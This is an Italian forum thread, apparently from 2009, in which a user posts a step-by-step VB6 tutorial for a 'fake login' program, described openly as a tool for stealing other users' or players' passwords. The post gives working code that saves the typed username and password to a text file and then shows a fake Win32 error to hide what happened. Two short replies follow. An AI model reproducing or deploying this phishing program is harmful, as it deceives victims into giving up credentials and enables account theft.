Come creare una message box o un fake login

Stato
Discussione chiusa ad ulteriori risposte.

miniuzi99

Utente Silver
28 Settembre 2009
105
17
0
86
Ultima modifica da un moderatore:
Ciao a tutti, dato che ieri mi sono imbattuto in una piccola voglia di voler creare un fake(non ho vb6 e col vb8 sbagliavo tutto) ho deciso di farvi una guida per il vb6(il portable nn mi fa salvare l'exe):
Creare una message box:

  1. Cosa è la message box???
  2. La message box è una finestra che si apre dopo cliccato un bottone, anche detto commandbutton
Ora passiamo a come farla...piuttosto semplice ma possiamo anche dire che serve come inizio...ok cominciamo:


Scarica vb8(o vb6, vb5)Consiglio il vb8
Apritelo
Fate new e poi windows form application
Create un bottone e rinominatelo in un nome stupido
Cliccateci sopra 2 volte
Ora inserite questo code in mezzo a bottone1_click
Codice:
Msgbox(" Il messaggio che volete")
Ora fate il debug e Cliccate sul bottone e...uscirà la 2° finestra con la scritta che vorrete ^^

Creare un fake login
Ora vi spiegherò come creare un fake in vb6

  1. Cosa è un fake login?

  1. Un fake login è un programma che ti permette di rubare le password ad altri account o/e a dei player


  • Scaricate Visual basic 6
  • Installatelo
  • apritelo
  • Ora andate su new e standard exe
  • Create 1 bottone, 2 textbox e 2 label
  • Mettetele in sequenza 1°label rinominatelo in username e sotto la textbox e così via
  • Rinominate il bottone in Log In!
  • Poi create un documento e chiamatelo Log In!
  • Poi inserite questo code nel bottone:
  • Codice:
    Open "C:\" & ("\Fake.txt") For Output As #1
    Write #1, "Username " & Text1.Text & ", " & "Password " & Text2.Text
    Close #1
    MsgBox "Win32 ha generato un errore, L'applicazione verrà immediatamente chiusa", VBexlamation + vbOKOnly, "Error WIN32"
    Unload Me
Spieghiamo le funzioni:
Codice:
Open "C:\" & ("\Fake.txt") For Output As #1
Write #1, "Username " & Text1.Text & ", " & "Password " & Text2.Text
Questa funzione spiega che praticamente farà copiare "Username " e la "Password" in un semplice documento di testo come il sottoscritto "Fake.txt"
Buon divertimento
Crediti: Miniuzi99 alias Patrizio:D







 
a parte dell'utilità dubbia, io avrei preferito se magari avessi spiegato i comandi invece di costringere la gente a fare copia e incolla senza capirci nulla... infatti penso che qualsiasi persona che conosca almeno le basi del vb lo sappia fare...
 
no....se almeno lui non lo crea, perchè se non è esperto, pensa solo che è un hack, dato che il documento è posizionato nel disco C del vostro pc, pero di essere stato abbastanza chiaro ;)
 
Stato
Discussione chiusa ad ulteriori risposte.